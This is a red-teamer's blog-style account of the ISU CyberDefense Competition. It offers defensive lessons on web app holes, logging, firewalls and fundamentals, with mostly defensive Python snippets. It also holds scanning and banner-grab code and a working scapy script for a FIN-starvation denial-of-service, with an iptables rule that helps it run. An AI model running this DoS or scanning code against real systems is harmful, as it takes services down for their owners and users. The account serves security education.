lessons from a cyberdefense competition red team part 2

This is a 3-part account of my experience on the red team for the ISU CyberDefense Competition. Part 1, Part 2, Part 3

Observations on cyber security
– Web application attacks and web site defacements are fun and tend to gather attention, from attackers and onlookers alike. Sadly, such attacks first of all don’t bring services down, and so don’t penalize teams all that much. Second, they result in little gain for the red team: a short-lived and very public victory that yields no root access, no further gains, and most likely closed vulnerabilities.

– Network and OS attacks have gone out of style, even against systems left with their balls hanging out in public network space. Several ripe systems survived a long time while people tinkered with web app vulnerabilities. Beyond nmap scans, I saw very little network twiddling or system/service attacks. This may mean that over the next few years, organizational network security and hardening will atrophy as everyone focuses on the web and on clients.

– The perimeter is still a battleground, wherever it may be. One team was rumored to be running IPv6 on their inside network, which would have made things interesting for the red team had we ever gotten inside it. Unfortunately, most efforts were spent pounding and poking the external surfaces rather than cruising the internal networks. Note that while a web server is part of the perimeter, it has several exposed layers: the application, the server software, and the OS. And someone wants to say defense in depth is dead?

– The majority of red team time was spent exploiting holes in the web apps. There were several openings to upload files and execute PHP code on the web servers. Unfortunately, once these attacks became apparent, such holes were closed and access became very limited. Some teams opted to break upload capabilities entirely, others removed such sections from their site, and others took the more correct route of disallowing specific PHP executions or overwrites (a sketch of that stricter approach follows below). Some teams left their /etc/passwd file exposed to such attacks, but in all cases the passwords were shadowed. More defense in depth…
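To make the “more correct” fix concrete, here’s a minimal sketch of whitelist-based upload validation. This is my illustration, not any team’s actual code; the directory, extension list, and function names are all hypothetical, and in Python rather than the PHP the teams were running.

```python
# Minimal sketch of whitelist-based upload validation. All names here are
# hypothetical; the point is whitelisting, no overwrites, no path tricks.
import os
import re

UPLOAD_DIR = "/var/www/uploads"          # served with script execution disabled
ALLOWED_EXTENSIONS = {".png", ".jpg", ".gif", ".txt"}

def safe_upload_path(filename: str) -> str:
    """Return a safe destination path, or raise ValueError."""
    # Strip any directory components the client supplied (../../etc/passwd).
    base = os.path.basename(filename)
    # Allow only a conservative character set, so no "shell.php.jpg " tricks.
    if not re.fullmatch(r"[A-Za-z0-9._-]{1,64}", base):
        raise ValueError("bad filename")
    ext = os.path.splitext(base)[1].lower()
    # Whitelist extensions instead of blacklisting .php; blacklists miss
    # variants like .php3 and .phtml.
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    dest = os.path.join(UPLOAD_DIR, base)
    # Refuse to overwrite existing files (the overwrite attacks noted above).
    if os.path.exists(dest):
        raise ValueError("file already exists")
    return dest

if __name__ == "__main__":
    for name in ("report.txt", "../../etc/passwd", "shell.php", "a.phtml"):
        try:
            print(name, "->", safe_upload_path(name))
        except ValueError as e:
            print(name, "-> rejected:", e)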

– Doing the fundamentals greatly increases survivability on the Internet. Put up a firewall and make sure your perimeter doesn’t leak information or have excessive holes. Keep patches up to date on systems and services. Change default passwords and accounts. After those are done, pay special attention to the accounts your services run under, the web applications, and the web servers. I can see why network attacks are being eclipsed by web-based attacks: securing web apps requires a huge skill set and a lot of experience and knowledge. Do you know how to write interactive PHP apps running on Apache securely enough that they hold up to attacks? That’s a job in itself, and one for more than a single person. Once the fundamentals are taken care of, it takes a special attacker to make headway into your network. Do they have 0day exploits for your patched services, or the ability to create them? That takes real skill, and I suspect only something like the DefCon CTF draws that kind of expertise into an organized competition. If you have the fundamentals down and your web apps and servers are solid, start changing service banners to really raise the bar for attackers. The fundamentals are money in the pockets of your company.

(A side note: not every IT person knows the fundamentals, even today. A lot of these students went into this competition missing the fundamentals, and many more will leave the program without a firm grasp of them. LEARN THE FUNDAMENTALS!)
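On the banner point: here’s a minimal banner-grab sketch showing what fingerprinting “just by using the service” looks like. The host is a placeholder; only point it at systems you own. A default Apache on Ubuntu happily announces itself in the Server header unless you change it.

```python
# Minimal HTTP banner grab: the freebie an attacker gets before any exploit.
# Host and port are placeholders; only scan systems you own.
import socket

def grab_http_banner(host: str, port: int = 80, timeout: float = 3.0) -> str:
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        return s.recv(1024).decode(errors="replace")

if __name__ == "__main__":
    # A default install typically answers with something like
    # "Server: Apache/2.x (Ubuntu)", exactly the giveaway worth removing.
    print(grab_http_banner("127.0.0.1"))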

– For the love of God, make an attacker’s life difficult. Make the firewall not respond to closed ports. Make my nmap scan take a long time and throw everything back at me as filtered. Make me earn my scans. Make sure egress on the firewall is strictly configured so even if I do get something planted, it might not be able to call back (and will be exposed in the logs).
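From the attacker’s chair, the difference between a firewall that rejects and one that silently drops is the difference between an instant answer and a burned timeout. A small sketch, with a made-up host in the documentation address range:

```python
# Sketch of what "closed" vs. "filtered" feels like from the scanner's side.
# A firewall that rejects answers instantly; one that drops makes every
# probe burn the full timeout. Host and ports are placeholders.
import socket
import time

def probe(host: str, port: int, timeout: float = 3.0) -> str:
    start = time.time()
    try:
        with socket.create_connection((host, port), timeout=timeout):
            verdict = "open"
    except ConnectionRefusedError:
        verdict = "closed (got a RST back: free information)"
    except socket.timeout:
        verdict = "filtered (silently dropped: I earned nothing)"
    except OSError as e:
        verdict = f"error: {e}"
    return f"{host}:{port} {verdict} ({time.time() - start:.1f}s)"

if __name__ == "__main__":
    for port in (22, 80, 8080):
        print(probe("192.0.2.10", port))   # 192.0.2.0/24 is a documentation range
```

Multiply that per-port timeout across 65,535 ports and the scan that took seconds against a chatty firewall suddenly takes hours.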

– Read the fucking logs. Wow. Once a server is up and running and a service is being used, tail all the logs. The logs will reveal who the attackers are and what they are probing. Especially those web app logs! Typically, once a vulnerability is found, one red team member exclaims over the find and the other 14 members of the team clamor over to see it for themselves. A sudden flood of hits on a seemingly normal part of the site should be cause for alarm. And after an incident does occur, those logs are your survival. You can put a defaced site back up, but it will just get owned again. Check the logs and close the holes, whether by changing the code, removing the offending pages, or adjusting server protections to disallow certain things.
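Here’s a tiny sketch of what “tail all the logs” can mean in practice: follow the Apache access log and flag any URL that suddenly draws a crowd. The log path, window, and threshold are made-up values to tune for your site.

```python
# Sketch: tail an Apache access log and flag URLs that suddenly draw a crowd
# (say, 14 red teamers clamoring over one teammate's find). The log path,
# window, and threshold are made-up values; tune them for your site.
import re
import time
from collections import Counter, deque

LOG = "/var/log/apache2/access.log"
WINDOW = 60          # seconds
THRESHOLD = 20       # hits on one URL within the window

# Common Log Format: host ident user [time] "METHOD path HTTP/x.x" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:\S+) (\S+)')

def follow(path):
    with open(path) as f:
        f.seek(0, 2)                 # start at end of file, like tail -f
        while True:
            line = f.readline()
            if not line:
                time.sleep(0.5)
                continue
            yield line

recent = deque()                     # (timestamp, src_ip, url)
for line in follow(LOG):
    m = LINE.match(line)
    if not m:
        continue
    ip, url = m.groups()
    now = time.time()
    recent.append((now, ip, url))
    while recent and recent[0][0] < now - WINDOW:
        recent.popleft()
    counts = Counter(u for _, _, u in recent)
    if counts[url] == THRESHOLD:     # fire once, as the threshold is crossed
        ips = {i for _, i, u in recent if u == url}
        print(f"ALERT: {counts[url]} hits on {url} in {WINDOW}s from {len(ips)} IPs")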

– Similar to logs, it can be amazingly insightful to have an outside packet logger or IDS hanging off the external interface of the perimeter. Even a DoS against the firewall can be detected, diagnosed, and fixed with such data. Without it, a few teams were left wondering why their service seemed down; they looked at the service and the box it ran on rather than at the firewall in front of them.
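If you want a feel for how little code an outside packet logger takes, here’s a bare-bones, Linux-only sketch that counts TCP SYNs per source, making a flood against the firewall visible even while the service looks “down.” The interface name is a placeholder, it needs root, and a real deployment would of course use tcpdump or a proper IDS instead.

```python
# Bare-bones outside packet logger: count TCP SYNs per source so a flood
# against the firewall is visible even when the service merely looks "down".
# Linux-only (AF_PACKET), needs root; the interface name is a placeholder.
import socket
import struct
from collections import Counter

ETH_P_ALL = 0x0003
syn_counts = Counter()

s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
s.bind(("eth0", 0))                          # external interface (placeholder)

while True:
    frame = s.recvfrom(65535)[0]
    if frame[12:14] != b"\x08\x00":          # EtherType: IPv4 only
        continue
    ihl = (frame[14] & 0x0F) * 4             # IP header length
    if frame[23] != 6:                       # IP protocol 6 = TCP
        continue
    tcp = 14 + ihl                           # start of TCP header
    flags = frame[tcp + 13]
    if flags & 0x02 and not flags & 0x10:    # SYN set, ACK clear
        src = socket.inet_ntoa(frame[26:30])
        syn_counts[src] += 1
        if syn_counts[src] % 100 == 0:
            print(f"{src}: {syn_counts[src]} SYNs seen")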

Coolest attack
The most interesting attack I saw was actually a DoS attack. The attacker called it a reverse LaBrea attack, though it could also be called tarpitting a server, or a FIN starvation attack. In it, the attacker opens hundreds of valid TCP connections and then begins the teardown sequence on each by sending a FIN/ACK packet. The server responds with an ACK and its own FIN/ACK, and then waits for the final ACK from the attacker. The attacker, however, never sends that final ACK, which keeps the server’s side of the connection open. Nicely enough, the server itself is not very busy, since it is doing nothing but waiting for hundreds of open connections to finish closing. This can be mitigated in numerous ways, such as detecting the DoS and adjusting the firewall to block after a threshold of connections is reached, aborting half-closed TCP teardowns, or lowering the wait timeout. A stock iptables setup is susceptible to this unless steps are taken to correct the behavior.
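For the protocol-curious, here’s a rough scapy sketch of one leg of that teardown. This is my illustration, not the attacker’s actual tool; the target is a placeholder, and the usual caveat applies: only point this at boxes you are authorized to test.

```python
# Rough sketch of one leg of the FIN-starvation teardown using scapy, for
# illustration only. Target is a placeholder; run it solely against hosts
# you are authorized to test. Caveat: the local kernel doesn't know about
# these crafted connections and will RST them, so block outbound RSTs
# first, e.g.: iptables -A OUTPUT -p tcp --tcp-flags RST RST -d TARGET -j DROP
from scapy.all import IP, TCP, sr1, send, conf

conf.verb = 0
TARGET, DPORT = "192.0.2.10", 80             # placeholders

def half_closed_connection(sport: int) -> None:
    seq = 1000
    # Full three-way handshake so the connection is real on the server.
    synack = sr1(IP(dst=TARGET) / TCP(sport=sport, dport=DPORT,
                                      flags="S", seq=seq), timeout=2)
    if synack is None or not synack.haslayer(TCP):
        return
    ack = synack[TCP].seq + 1
    send(IP(dst=TARGET) / TCP(sport=sport, dport=DPORT, flags="A",
                              seq=seq + 1, ack=ack))
    # Begin the teardown: send FIN/ACK, then never ACK the server's FIN.
    # The server answers and then sits waiting for our final ACK.
    send(IP(dst=TARGET) / TCP(sport=sport, dport=DPORT, flags="FA",
                              seq=seq + 1, ack=ack))

# Hundreds of these and the server idles with a pile of half-dead connections.
for sport in range(40000, 40200):
    half_closed_connection(sport)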

Some false lessons
While lots of lessons and insight can be learned, there are some red herrings and false lessons that hopefully no one takes away.

– Applications are not always secure. Almost every team was running fairly new versions of their applications and systems, from fresh phpBB and SquirrelMail installs to new Ubuntu boxes. While they might seem impregnable today, will they be impregnable in a year at a company with poor patch management? Nope. Those little applications like a wiki or phpBB can quickly draw cold sweat on the necks of IT admins…

– While the red team had a lot of talent in one room, I still wouldn’t consider any of them black hat hackers by any means. Most were students, and only a handful were security professionals. Our skillsets only go so far, but the real world can throw any level of skill at you.

– Attacks can still come from within. Social engineering on any scale that would allow unsupervised physical access to systems was pretty much out of scope, and attacks on clients, such as emailed trojans, were not really possible. There really weren’t many systems on the inside to dupe for a foothold; this was more like attacking a standalone DMZ. But don’t forget that every system and user is a target.

– DoS attacks are still debilitating; they can end your night quickly in a competition and close a business just as quickly in the real world. And for as debilitating as a DoS attack is, it is typically the least planned-for and one of the harder attacks to thwart. (Ok, DDoS is harder still, just to pre-empt commenters saying it is easy!)

Personal lessons
I’m out of practice. A competition is not the place to fire up Metasploit 3 for the first time (although thankfully I have used Metasploit 2 in the past). Likewise, know the general tools for the basic stuff, and practice with them: DNS zone transfers, nmap scanning, OS/service fingerprinting (both with a scanner and just by using the services, like spotting Apache running on Ubuntu). I’m rusty on almost everything, so practice is definitely in order; it’s just one of those things I don’t get to do daily on the job (or even weekly or monthly!). Know the BackTrack tools inside and out. Be familiar with wireless attacks both as an associated client (airpwn, hamster/ferret, rogue AP, MITM) and as an outside attacker (DoS, WEP cracking, IV generation).

Knowing these things well up front goes a long way toward being an efficient attacker. Just like the defenders, attackers need to know the fundamentals and practice them regularly. That means less time spent relearning tools and settings, and more time being surgical and creative. It can also mean less jubilation at low-level triumphs, and more thought about how to quietly leverage them for the most gain over the long run.
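As one example of a basic worth keeping fresh: a zone transfer check takes only a few lines with dnspython. The nameserver and zone below are placeholders; an open AXFR hands an attacker the whole naming map for free.

```python
# Quick zone-transfer (AXFR) check with dnspython, one of those basics worth
# practicing. Nameserver and zone are placeholders.
import dns.query
import dns.zone

NS, ZONE = "ns1.example.com", "example.com"   # placeholders

try:
    z = dns.zone.from_xfr(dns.query.xfr(NS, ZONE, timeout=5))
    print(f"AXFR allowed! {len(z.nodes)} names leaked from {ZONE}:")
    for name in list(z.nodes)[:10]:
        print("  ", name)
except Exception as e:
    print(f"AXFR refused or failed (good): {e}")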
